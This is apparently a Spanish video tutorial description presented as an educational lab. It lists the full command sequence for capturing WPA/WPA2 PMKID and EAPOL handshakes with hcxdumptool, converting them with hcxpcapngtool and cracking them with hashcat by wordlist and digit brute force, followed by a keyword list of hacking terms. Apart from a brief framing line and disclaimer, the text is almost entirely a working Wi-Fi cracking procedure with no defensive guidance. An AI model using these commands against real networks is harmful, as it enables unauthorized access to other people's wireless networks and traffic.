Laboratorio de pruebas y te explicamos como debes evitar este tipo de ataques y como debes
configurar tu red wireless o inalámbrica.
Disclaimer / Descargo de responsabilidad: este canal es estrictamente educativo para aprender sobre ciberseguridad
Comandos Usados
Código: Seleccionar todo
iwconfig
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
sudo apt-get install libcurl4-openssl-dev libssl-dev pkg-config
sudo make
sudo make install
hcxdumptool --version
Instalar
hcxpcapngtool
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
sudo hcxdumptool --do_rcascan -i wlan0
sudo hcxdumptool -i wlan0 -o dumpfile.pcapng --active_beacon --enable_status=15
sudo systemctl start wpa_supplicant.service
sudo systemctl start NetworkManager.service
Convert the traffic to hash format 22000
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
En hashcat
hashcat -m 22000 hash.hc22000 wordlist.txt
Windows:
m --hash-type WPA-PBKDF2-PMKID+EAPOL
a --attack-mode Brute-force
hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d
Escaneo de espectro
sudo hcxdumptool --do_rcascan -i wlan0
https://www.wireshark.org/tools/oui-lookup.html
https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
https://github.com/ZerBea/hcxdumptool.git
VIDEO TUTORIAL
Pentesting synology xpenology Security Technologies Nmap Sistema operativo Operating Systems Instalación y configuración Install and configure ssh Metasploit Unauthenticated LAN Remote Code Execution Wordlist Reverse connection Shell PMKID EAPOL Handshake backdoor LAN | Local Area Network CMD execution RFI LFI How to Exploit and Test this Critical Vulnerability ransomware attackers repository Netcat Listener Exploit Code NC NetCat GitHub Firewall Pentest Lab Setup Laboratorio de Trabajo Security Ethical Hacking Certification Guide OWASP ZAP Macro Terminal python blue team red team Windows Bug Actualizar update parchear Operating System mfsconsole vulnerabilidades de seguridad detección de intrusos Networking PowerPoint Access Recuperar contraseña Advanced password recovery macropack,Ethical Hacker,Penetration Tester,Cybersecurity Consultant,learn security,unix,OSINT,oscp certification,try hack me,hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,como usar kali linux,comandos,commands,remote function,metasploit Attack examples Brute-Force attack Dictionary attack Cracking WPA/WPA2 with hashcat